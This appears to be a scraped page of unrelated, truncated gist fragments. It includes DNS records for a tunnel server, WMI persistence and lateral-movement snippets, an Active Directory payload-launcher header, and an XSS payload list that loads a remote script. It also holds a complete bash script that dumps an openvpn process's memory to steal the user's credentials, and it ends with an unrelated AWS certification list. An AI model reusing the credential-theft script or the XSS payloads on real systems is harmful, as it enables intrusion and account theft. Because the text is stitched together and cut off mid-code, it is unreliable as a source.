##Domain
We need some records on our domain (mydomain.com) DNS for connections. Add these records:
t1 IN NS t1ns.mydomain.com. ; note the final dot!
t1ns IN A OUR_SERVER_IP
##Server
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'LateralMovementEvent' | |
| Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ | |
| Namespace = 'root/subscription' |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'DriveChanged' | |
| Query = 'SELECT * FROM Win32_VolumeChangeEvent' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |
| #Requires -Version 2 | |
| function New-ADPayload { | |
| <# | |
| .SYNOPSIS | |
| Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
| a one-line launcher. | |
| Author: @harmj0y |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| #!/bin/bash | |
| # This little hack-job will grab credentials from a running openvpn process in Linux | |
| # Keep in mind this won't work if the user used the --auth-nocache flag | |
| # Collects the PID of every ps line that mentions "openvpn"; with more than one match $pid holds several words, which the unquoted expansions below then word-split. | |
| pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}') | |
| # grep reads /proc/$pid/maps from its file argument (the echo on stdin is ignored); sed keeps the start/end of each rw-p mapping and gdb attaches with --pid to dump each range into the working directory. | |
| # Defender note: the attach goes through ptrace, so kernel.yama.ptrace_scope and not running openvpn under a user the script can reach block it; a debugger attaching to openvpn and *.dump files appearing on disk are the artefacts to alert on. | |
| echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done | |
| echo "Your credentials should be listed below as username/password" | |
| # Assumes the username and password are lines 3-4 of the concatenated strings output -- a heuristic, not something the dump layout guarantees. | |
| strings *.dump | awk 'NR>=3 && NR<=4 { print }' | |
| # Deletes every *.dump in the working directory, including any that were already there before the script ran. | |
| rm *.dump --force |
| ''' | |
| Input MD5 : BB4E83D7A77AADD7F62728314EF09461 | |
| File Name : C:\Program Files (x86)\Powersaves For AMIIBO\Powersaves For AMIIBO.exe | |
| 0x108fd0 : schannel_recv -> log buffer on end | |
| 0x1090d0 : schannel_recv end | |
| 0x108d10 : schannel_send -> log buffer on start | |
| 0xce61 : deals with https "Token" | |
| 0xceab : deals with https "Vuid" |
| function Get-DownloadedPEHashes | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$true, Position=0)] | |
| [String]$Path, | |
| [Switch]$Recursive = $true | |
| ) | |
| if (!$Path.EndsWith('\')) |
##Domain
We need some records on our domain (mydomain.com) DNS for connections. Add these records:
t1 IN NS t1ns.mydomain.com. ; note the final dot!
t1ns IN A OUR_SERVER_IP
##Server
| # Based off @mattifestation's example: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'HumanInterfaceDevice' | |
| Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "Win32_PointingDevice" OR TargetInstance ISA "Win32_KeyBoard"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ |
A curated list of AWS resources to prepare for the AWS Certifications
A curated list of awesome AWS resources you need to prepare for all 5 AWS Certifications. This gist will include: open source repos, blogs & blog posts, ebooks, PDFs, whitepapers, video courses, free lectures, slides, sample tests and many other resources.
Index: